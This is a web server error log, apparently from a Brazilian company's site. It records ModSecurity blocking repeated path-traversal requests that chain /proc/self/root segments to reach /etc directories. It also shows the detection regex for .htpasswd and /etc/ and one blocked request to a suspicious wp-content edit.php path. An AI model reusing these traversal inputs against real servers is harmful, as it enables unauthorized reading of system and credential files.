https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:12.811256 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.241.31:44688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquwCmAPhZkrhU8w4lvRwAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:55:13.495373 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.243.128:55988] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquwUzinOy1jxa1j4cXPwAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:15.920191 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:56004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquw9Y0UrI5A3LftIyrfAAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:18.471514 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:56020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquxvu8EFLIOrSqIpsF6wAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:19.829602 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:39420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqux_u8EFLIOrSqIpsF8AAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:21.145251 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:39434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquyew_le52K8_3pV3h0gAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:29.494910 2026] [:error] [pid 19507:tid 140411574073088] [client 204.12.208.18:65521] [client 204.12.208.18] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/wp-content/pl2ea67b/edit.php"] [unique_id "abqu0dY0UrI5A3LftIyrgAAAAZQ"], referer: https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php
[Wed Mar 18 10:55:31.699862 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:39438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu0wkwaGbbGflqUZASPAAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:32.986930 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.243.128:52558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu1EzinOy1jxa1j4cXVgAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:35.303621 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:52560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu1wkwaGbbGflqUZASPwAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:36.667447 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:52564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu2OyqAr6etmhZHNrCewAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:42.935054 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.241.31:55124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu3kzinOy1jxa1j4cXXwAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:55:48.870111 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:47020] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu5NY0UrI5A3LftIyrmwAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:55:50.498128 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:52574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu5sdf6f5d65gmYZTXmQAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:52.874558 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:50660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu6EzinOy1jxa1j4cXZQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:55:54.189645 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:50664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu6sdf6f5d65gmYZTXmwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:56:00.059025 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.243.128:50668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu8EzinOy1jxa1j4cXdgAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:56:02.944051 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:46994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu8gkwaGbbGflqUZASVgAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:56:07.568243 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:47002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu9gkwaGbbGflqUZASWwAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:56:12.379472 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:47012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqu_Na6ubjKNq_cu4aciQAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:56:18.667470 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:41626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvAtY0UrI5A3LftIyrqwAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:56:21.375489 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:58854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvBQkwaGbbGflqUZASYQAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
